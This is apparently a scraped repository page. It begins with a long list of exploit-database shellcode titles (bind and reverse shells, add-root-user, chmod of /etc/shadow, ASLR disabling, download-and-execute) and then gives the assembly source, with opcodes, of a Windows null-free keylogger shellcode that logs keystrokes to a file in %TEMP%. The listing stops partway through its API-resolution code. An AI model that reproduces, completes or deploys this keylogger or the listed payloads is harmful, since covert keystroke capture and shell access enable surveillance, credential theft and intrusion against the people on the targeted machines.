Safari 4.0.5 - 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Shellcode
Linux - Bind 6778/TCP (XOR Encoded) Polymorphic Shellcode (125 bytes)
Linux - Bind Shell (nc -lp 31337 -e /bin//sh) Polymorphic Shellcode (91 bytes)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)
Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)
Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode
Linux - Bind TCP Shell (6778/TCP) XOR Encoded Polymorphic Shellcode (125 bytes)
Linux - Bind Netcat Shell (31337/TCP) Polymorphic Shellcode (91 bytes)
ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator)

Win32 - Write-to-file Shellcode (278 bytes)
Windows x86 - Write-to-file Null-Free Shellcode (278 bytes)
Linux/x86 - Bind Shell Netcat 8080/TCP Shellcode (75 bytes)
Linux/x86 - /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 English - MessageBoxA Shellcode (87 bytes)
BSD/x86 - Bind Shell 2525/TCP Shellcode (167 bytes)
Win32 - Checksum Routine Shellcode (18 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes)
Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes)
Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)
BSD/x86 - Bind TCP Shell (2525/TCP) Shellcode (167 bytes)
Windows x86 - Checksum Routine Shellcode (18 bytes)

Win32/XP SP3 (TR) - Add Administrator 'zrl' Shellcode (127 bytes)
Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)
Win32/XP Professional SP3 (EN) x86 - Add New Local Administrator 'secuid0' Shellcode (113 bytes)
Win32 - Add New Local Administrator 'secuid0' Shellcode (326 bytes)
Windows XP Professional SP3 (English) x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)
Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)
ARM - Bind Connect (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode
ARM - Loader Port 0x1337 Shellcode
ARM - ifconfig eth0 and Assign Address 192.168.0.2 Shellcode
ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode
ARM - Loader (0x1337/TCP) Shellcode
ARM - ifconfig eth0 192.168.0.2 up Shellcode
ARM - Create a New User with UID 0 Shellcode (Metasploit) (Generator) (66+ bytes)
Win32 - Speaking 'You got pwned!' Shellcode
FreeBSD/x86 - connect back Shellcode (81 bytes)
BSD/x86 - Bind Shell 31337/TCP + fork Shellcode (111 bytes)
Win32 - eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod(_/etc/shadow__ 0666) + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Shell Netcat 6666/TCP Shellcode (69 bytes)
OSX/Intel (x86-64) - Reverse TCP Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Windows - WinExec Add New Local Administrator 'RubberDuck' + ExitProcess Shellcode (279 bytes)
Linux/x86 - ASLR deactivation Shellcode (83 bytes)
Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Linux/x86 - Reverse  TCP SSL Shell (localhost:8080) Shellcode (422 bytes)
ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)
Windows 5.0 < 7.0 x86 - Speaking _You got pwned!_ Null-Free Shellcode
FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:1337/TCP) Shellcode (81 bytes) (Generator)
BSD/x86 - Bind TCP Shell (31337/TCP) + fork Shellcode (111 bytes)
Windows x86 - eggsearch Shellcode (33 bytes)
Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)
OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)
Linux/x86 - Disable ASLR Security Shellcode (83 bytes)
Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)
Linux/x86 - Reverse TCP SSL Shell (localhost:8080) Shellcode (422 bytes)
Win32/PerfectXp-pc1/SP3 (TR) - Add Administrator 'kpss' Shellcode (112 bytes)
Linux/x86 - Egghunter Shellcode (29 bytes)
Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)
Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)
Linux/MIPS - XOR Encoder Shellcode (Generator) (60 bytes)
Linux/SuperH (sh4) - setuid(0) ; execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)
Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)
Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes)

Linux/MIPS - Add User(UID 0) (rOOt/'pwn3d) Shellcode (164 bytes)
Linux/MIPS - Add Root User (rOOt/pwn3d) Shellcode (164 bytes)

Linux/MIPS - Connectback Shellcode (port 0x7a69) (168 bytes)
Linux/MIPS - Reverse TCP Shell (0x7a69/TCP) Shellcode (168 bytes)

Linux/x86 - setuid(0) + setgid(0) + Add User (iph) To /etc/passwd Polymorphic Shellcode
Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode

Linux/x86-64 - Add User (t0r/Winner) Shellcode (189 bytes)
Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes)

Linux/ARM (Raspberry Pi) - Reverse TCP Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (10.1.1.2:0x1337/TCP) Shellcode (72 bytes)

Linux/ARM (Raspberry Pi) - chmod(_/etc/shadow__ 0777) Shellcode (41 bytes)
Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)
Windows XP Professional SP3 - Full ROP calc Shellcode (428 bytes)
Windows x64 - Bind TCP Shell Shellcode (508 bytes)
Windows XP Professional SP3 - calc Full ROP Shellcode (428 bytes)
Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes)

Cisco ASA - Authentication Bypass 'EXTRABACON' (Improved Shellcode) (69 bytes)
Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)

Windows RT ARM - Bind Shell 4444/TCP Shellcode
Windows RT ARM - Bind TCP Shell (4444/TCP) Shellcode
Windows - Messagebox Shellcode (113 bytes)
Linux/MIPS (Little Endian) - Reverse TCP Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind Shell 4444/TCP Shellcode (357 Bytes)
Windows - Add Administrator 'BroK3n' Shellcode (194 bytes)
Windows - Messagebox Null-FreeShellcode (113 bytes)
Linux/MIPS (Little Endian) - Reverse TCP /bin/sh Shell (192.168.1.177:31337/TCP) Shellcode (200 bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)
Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add New Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes)
Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)
Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes)
Linux/x86-64 - Bind TCP Password (Z~r0) Shell (4444/TCP) Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) Shell (127.0.0.1:4444/TCP) Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator 'ALI' + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes)
Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)
Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)
Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Linux/MIPS (Little Endian) - Chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - Chmod 666 /etc/passwd Shellcode (55 bytes)
Windows XP x86-64 - Download File + Execute Shellcode (Generator)
Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)
Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)
Linux/x86 - execve(_/bin/sh_) (ROT13 Encoded) Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow obfuscated Shellcode (84 bytes)
Linux/x86 - execve(_/bin/sh_) ROT13 Encoded Shellcode (68 bytes)
Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes)
Linux/x86 - Reverse TCP Shell (192.168.1.133:33333) Shellcode (72 bytes)
Linux/x86 - Bind Shell 33333/TCP Shellcode (96 bytes)
Linux/x86 - Disable ASLR Shellcode (84 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333) Shellcode (72 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes)
Linux/x86 - Disable ASLR Security Shellcode (84 bytes)
Linux/x86 - Typewriter Shellcode (Generator)
Linux/x86 - Create 'my.txt' Working Directory Shellcode (37 bytes)
Linux/x86 - Typewriter Shellcode (Generator)
Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes)
Win32/XP SP3 - Create ('file.txt') Shellcode (83 bytes)
Win32/XP SP3 - Restart computer Shellcode (57 bytes)
Linux/x86 - custom execve Shellcode (Encoder/Decoder) (Generator)
Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes)
Windows XP SP3 x86 - Restart Computer Shellcode (57 bytes)
Linux/x86 - Custom execve Shellcode (Encoder/Decoder) (Generator)

Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp 17771 Shellcode (58 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes)
Linux/x86 - chmod() 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve /bin/sh Shellcode (2) (21 bytes)
Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes)
Linux/x86 - execve /bin/sh Shellcode (21 bytes)
Linux/x86 - Bind Shell Netcat 5555/TCP Shellcode (60 bytes)
Linux/x86-64 - execve(/bin/sh) Shellcode (30 bytes)
Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes)
Linux/x86-64 - execve(/bin/sh) Null-Free Shellcode (30 bytes)
Linux/x86 - chmod('/etc/passwd'_0777) Shellcode (42 bytes)
Linux/x86 - chmod('/etc/gshadow') Shellcode (37 bytes)
Linux/x86 - chmod('/etc/shadow'_'0777') Shellcode (42 bytes)
Linux/x86 - exec('/bin/dash') Shellcode (45 bytes)
Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes)
Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes)
Linux/x86 - exec(_/bin/dash_) Shellcode (45 bytes)
Linux/x86 - /bin/sh (ROT7 Encoded) Shellcode
Win32/XP SP3 (TR) - MessageBox Shellcode (24 bytes)
Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode
Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes)
Windows x86 - user32!MessageBox 'Hello World!' Null-Free Shellcode (199 bytes)
Linux/x86 - /bin/sh (ROL/ROR Encoded) Shellcode
Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes)
Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode
OSX/x86-64 - /bin/sh Null-Free Shellcode (34 bytes)
Mainframe/System Z - Bind Shell 12345/TCP Shellcode (2488 bytes)
OSX/x86-64 - execve /bin/sh Null-Free Shellcode (34 bytes)
Mainframe/System Z - Bind TCP Shell (12345/TCP) Null-Free Shellcode (2488 bytes)

Linux/x86 - Create file with permission 7775 + exit Shellcode (Generator)
Linux/x86 - Create File With Permission 7775 + exit Shellcode (Generator)
OSX/x86-64 - Bind 4444/TCP Null-free Shellcode (144 bytes)
Linux/x86-64 - /bin/sh Shellcode (34 bytes)
Google Android - Telnetd Port 1035 with Parameters Shellcode (248 bytes)
OSX/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (144 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (34 bytes)
Google Android - Bind Telnetd Shell (1035/TCP) + Environment / Parameters Shellcode (248 bytes)

Linux/x86-64 - Bind TCP Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator) (Python)
Linux/x86-64 - Bind 4444/TCP Shellcode (103 bytes)
Linux/x86-64 - Bind TCP Password (hack) Shell (4444/TCP) Shellcode (162 bytes)
Windows XP < 10 - WinExec Null-Free Shellcode (Generator)
Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes)
Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes)

Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Shellcode (151 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes)

Linux/x86-64 - execve (xor/not/div Encoded) Shellcode (54 bytes)
Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes)

Linux x86/x86-64 - Bind 4444/TCP Shellcode (251 bytes)
Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Polymorphic Shell (127.0.0.1:4444/TCP) Shellcode (135 bytes)
Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes)
Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes)

Linux/ARM - Connect back to 10.0.0.10:1337 with /bin/sh Shellcode (95 bytes)
Linux/ARM - Reverse TCP /bin/sh Shell (10.0.0.10:1337/TCP) Shellcode (95 bytes)

Linux/x86-64 - Bind 5600/TCP Shellcode (81 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes)

Linux/x86-64 - Bind 5600/TCP Shellcode (86 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes)
Linux/x86 - Reverse TCP Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind 1472/TCP Shell (IPv6) Shellcode (1250 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes)
Win32 .Net Framework - Execute Native x86 Shellcode
Linux/x86-64 - Bind 1472/TCP Shell (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)
Windows .Net Framework x86 - Execute Native x86 Shellcode
Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes)

Linux/x86 - Bind Shell 1234/TCP (Configurable Port) Shellcode (87 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (1234/TCP) Shellcode (87 bytes) (Generator)
Linux/x86 - Bind Shell 4444/TCP Shellcode (656 bytes)
Linux/x86-64 - execve (XOR Encoded) Shellcode (84 bytes)
Linux/Windows/BSD x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)
Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes)
Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes)
BSD / Linux / Windows x86/x86-64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)

Linux/x86 - Bind Shell /bin/nc -le /bin/sh -vp13337 Shellcode (56 bytes)
Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes)
Linux/x86 - /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - /etc/passwd File Sender Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shellcode (64 bytes)
Linux/x86 - Bind Shell 4444/TCP Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat (4442/TCP) Shell / SSL / Multi-Channel (4444/TCP-4447/TCP) / Persistant / Fork / IPv4/6 / Password Shellcode (176 bytes)
Linux/x86 - Reverse TCP Shell (192.168.227.129:4444) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Shellcode (172 bytes)
Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode
Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes)
Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes)
Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes)
Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)
Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes)
Linux/x86-64 - Bind TCP (4442/TCP) Shell / Syscall Persistent / Multi-Terminal (4444/TCP-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)
Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)
Linux/CRISv32 - Axis Communication - Reverse TCP /bin/sh Shell (192.168.57.1:443/TCP) Shellcode (189 bytes)
Linux/x86 - Bind Netcat 98/TCP + UDP Shellcode (44/52 bytes)
Linux/x86 - Bind zsh 9090/TCP Shellcode (96 bytes)
Linux/x86 - Reverse TCP ZSH (127.255.255.254:9090/TCP) Shellcode (80 bytes)
Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes)
Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes)
Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes)

Windows x64 - WinExec() Shellcode (93 bytes)
Windows x64 - cmd.exe WinExec() Shellcode (93 bytes)

Linux/x86-64 - /bin/sh -c reboot Shellcode (89 bytes)
Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)
Linux/x86 - Reverse Netcat + mkfifo  (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - /bin/bash -c Arbitrary Command Execution Shellcode (72 bytes)
Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)
Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)

Linux/x86-64 - Bind 5600/TCP - Shellcode (87 bytes)
Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (Genearator) (129 bytes)
Linux/x86 - Reverse TCP Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind Shell Dual/Multi Mode Shellcode (156 bytes)
Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)
Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)
Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)

Linux/x86-64 - Reverse TCP Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)
Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)

Windows x86 - Executable Directory Search Shellcode (130 bytes)
Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes)

Linux/x86-64 - Flush IPTables Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)

Linux/x86-64 - Reverse Netcat Polymorphic Shell (127.0.0.1:1234) Shellcode (106 bytes)
Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)

Linux/x86 - Bind Shell Shellcode (44 bytes)
Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Shellcode (67 bytes)
Linux/x86 - Reverse /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)
Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)
Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)
Linux/x86 - Disable ASLR Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Shellcode (113 bytes)
Linux/x86 - Disable ASLR Security Shellcode (80 bytes)
Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)
Linux/x86-64 - /bin/sh Shellcode (31 bytes)
Linux/x86 - execve(/bin/sh) setuid(0) setgid(0) (XOR Encoded) Shellcode (66 bytes)
Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)
Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)
Linux/x86 - Reverse UDP Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind Shell 4444/TCP Shellcode (75 bytes)
Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)
Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)

Linux x86 - /bin/sh Shellcode (24 bytes)
Linux x86 - execve /bin/sh Shellcode (24 bytes)

Linux/x86_64 - kill All Processes Shellcode (19 bytes)
Linux/x86_64 - Kill All Processes Shellcode (19 bytes)

Php Cloud mining Script - Authentication Bypass
(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass
2017-08-23 05:01:29 +00:00

366 lines
No EOL
14 KiB
C
Executable file
Raw Blame History

/*
; Exploit Title: All windows null free shellcode - functional keylogger to file - 601 (0x0259) bytes
; Date: Sat May 7 19:32:08 GMT 2016
; Exploit Author: Fugu
; Vendor Homepage: www.microsoft.com
; Version: all afaik
; Tested on: Win7 (im guessing it will work on others)
; Note: it will write to "log.bin" in the users %TEMP% directory.
; keystrokes are saved in format: "Virtual-Key Codes", from
; msdn.microsoft.com website
; nasm -f win32 test.asm && i686-w64-mingw32-ld -o test.exe test.obj
; |STACK| (at the main loop)
; 00000000 Location of bool array
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 |
; 00000000 V_
; (FILE HANDLE)
; KERNEL32.lstrcatA
; KERNEL32.Sleep
; KERNEL32.GetEnvironmentVariableA
; KERNEL32.CreateFileA
; KERNEL32.WriteFileA
; user32.GetKeyState
; user32.7EC00000
; KERNEL32.LoadLibraryA
; KERNEL32.GetModuleHandleA
; KERNEL32.GetProcAddress
; KERNEL32.7B410000
section .bss
section .data
section .text
global _start
_start:
cld ; 00000000 FC
xor edx,edx ; 00000001 31D2
mov dl,0x30 ; 00000003 B230
push dword [fs:edx] ; 00000005 64FF32
pop edx ; 00000008 5A
mov edx,[edx+0xc] ; 00000009 8B520C
mov edx,[edx+0x14] ; 0000000C 8B5214
loc_fh:
mov esi,[edx+0x28] ; 0000000F 8B7228
xor eax,eax ; 00000012 31C0
mov ecx,eax ; 00000014 89C1
mov cl,0x3 ; 00000016 B103
loc_18h:
lodsb ; 00000018 AC
rol eax,byte 0x8 ; 00000019 C1C008
lodsb ; 0000001C AC
loop loc_18h ; 0000001D E2F9
lodsb ; 0000001F AC
cmp eax,0x4b45524e ; 00000020 3D4E52454B
jz loc_2ch ; 00000025 7405
cmp eax,0x6b65726e ; 00000027 3D6E72656B
loc_2ch:
mov ebx,[edx+0x10] ; 0000002C 8B5A10
mov edx,[edx] ; 0000002F 8B12
jnz loc_fh ; 00000031 75DC
mov edx,[ebx+0x3c] ; 00000033 8B533C
add edx,ebx ; 00000036 01DA
push dword [edx+0x34] ; 00000038 FF7234
mov edx,[edx+0x78] ; 0000003B 8B5278
add edx,ebx ; 0000003E 01DA
mov esi,[edx+0x20] ; 00000040 8B7220
add esi,ebx ; 00000043 01DE
;GetProcAddress
xor ecx,ecx ; 00000045 31C9
loc_47h:
inc ecx ; 00000047 41
lodsd ; 00000048 AD
add eax,ebx ; 00000049 01D8
cmp dword [eax],0x50746547 ; 0000004B 813847657450
jnz loc_47h ; 00000051 75F4
cmp dword [eax+0x4],0x41636f72 ; 00000053 817804726F6341
jnz loc_47h ; 0000005A 75EB
cmp dword [eax+0x8],0x65726464 ; 0000005C 81780864647265
jnz loc_47h ; 00000063 75E2
dec ecx ; 00000065 49
mov esi,[edx+0x24] ; 00000066 8B7224
add esi,ebx ; 00000069 01DE
mov cx,[esi+ecx*2] ; 0000006B 668B0C4E
mov esi,[edx+0x1c] ; 0000006F 8B721C
add esi,ebx ; 00000072 01DE
mov edx,[esi+ecx*4] ; 00000074 8B148E
add edx,ebx ; 00000077 01DA
mov edi,edx ; 00000079 89D7
push edx ; 0000007B 52
;GetModuleHandleA
xor eax,eax ; 0000007C 31C0
push eax ; 0000007E 50
push dword 0x41656c64 ; 0000007F 68646C6541
push dword 0x6e614865 ; 00000084 686548616E
push dword 0x6c75646f ; 00000089 686F64756C
push dword 0x4d746547 ; 0000008E 684765744D
push esp ; 00000093 54
push ebx ; 00000094 53
call edi ; 00000095 FFD7
lea esp,[esp+0x14] ; 00000097 8D642414
push eax ; 0000009B 50
;GetModuleHandleA("USER32.DLL")
push dword 0x88014c4c ; 0000009C 684C4C0188
dec byte [esp+0x2] ; 000000A1 FE4C2402
push dword 0x442e3233 ; 000000A5 6833322E44
push dword 0x52455355 ; 000000AA 6855534552
push esp ; 000000AF 54
call eax ; 000000B0 FFD0
xor edx,edx ; 000000B2 31D2
cmp eax,edx ; 000000B4 39D0
jnz loc_f0h ; 000000B6 7538
lea esp,[esp+0xc] ; 000000B8 8D64240C
;LoadLibraryA
push edx ; 000000BC 52
push dword 0x41797261 ; 000000BD 6861727941
push dword 0x7262694c ; 000000C2 684C696272
push dword 0x64616f4c ; 000000C7 684C6F6164
push esp ; 000000CC 54
push ebx ; 000000CD 53
call edi ; 000000CE FFD7
lea esp,[esp+0x10] ; 000000D0 8D642410
push eax ; 000000D4 50
;LoadLibraryA("USER32.DLL")
push dword 0x77014c4c ; 000000D5 684C4C0177
dec byte [esp+0x2] ; 000000DA FE4C2402
push dword 0x442e3233 ; 000000DE 6833322E44
push dword 0x52455355 ; 000000E3 6855534552
push esp ; 000000E8 54
call eax ; 000000E9 FFD0
lea esp,[esp+0xc] ; 000000EB 8D64240C
push eax ; 000000EF 50
;GetKeyState
loc_f0h:
mov edx,eax ; 000000F0 89C2
push dword 0x1657461 ; 000000F2 6861746501
dec byte [esp+0x3] ; 000000F7 FE4C2403
push dword 0x74537965 ; 000000FB 6865795374
